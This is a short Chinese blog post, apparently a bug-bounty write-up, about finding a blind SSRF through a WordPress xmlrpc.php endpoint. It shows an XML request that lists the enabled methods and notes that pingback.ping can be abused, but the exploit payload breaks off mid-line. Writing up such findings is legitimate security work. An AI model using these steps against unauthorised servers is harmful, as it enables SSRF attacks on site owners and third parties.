当前位置: 首页 > news >正文

【网络安全】XML-RPC漏洞之盲SSRF

未经许可,不得转载。

文章目录

    • 正文

漏洞原理参考:【网络安全】XML-RPC PHP WordPress漏洞

正文

探索目标时,访问该链接:https://www.target.com/about-us/xmlrpc.php,页面如下:

在这里插入图片描述

修改GET为POST,并构造payload,以检查 XML RPC 服务器上启用了哪些方法:

<methodCall> 
<methodName>system.listMethods</methodName> 
<params></params> 
</methodCall>

由回显可知,pingback.ping方法是可利用的,因此我构造了以下payload:

<?xml version=”1.0" e

http://www.mrgr.cn/news/12023.html

相关文章:

  • 一篇精通Ansible之playbook
  • P2709 小B的询问
  • 知识图谱问答召回机制-GraphRAG
  • AIGC:Flux.1 NF4 使用 diffusers 推理
  • 观察者模式(Observer Pattern)
  • xss-labs通关攻略 11-15关
  • 代码随想录 -- 哈希表 -- 四数相加 II
  • 使用canal增量同步ES索引库数据
  • 主场竞争,安踏把背影留给耐克
  • centos7安装Kafka单节点环境部署三-安装Logstash
  • mysql 导入excel文件 navicate
  • Python 爬虫 示例
  • 如何使用Redis实现乐观锁?
  • 已解决org.xml.sax.SAXNotRecognizedException异常的正确解决方法,亲测有效!!!
  • 惠州本地专业的企业管理咨询公司
  • ansible --limit 在指定主机执行任务
  • 手机号码归属地查询如何用PHP进行调用
  • 算法-有效的字母异位词
  • 算法训练第24天|122.买卖股票的最佳时机II|55. 跳跃游戏|45.跳跃游戏II|1005.K次取反后最大化的数组和
  • Swift 中的文本渲染艺术:深入探索 Core Text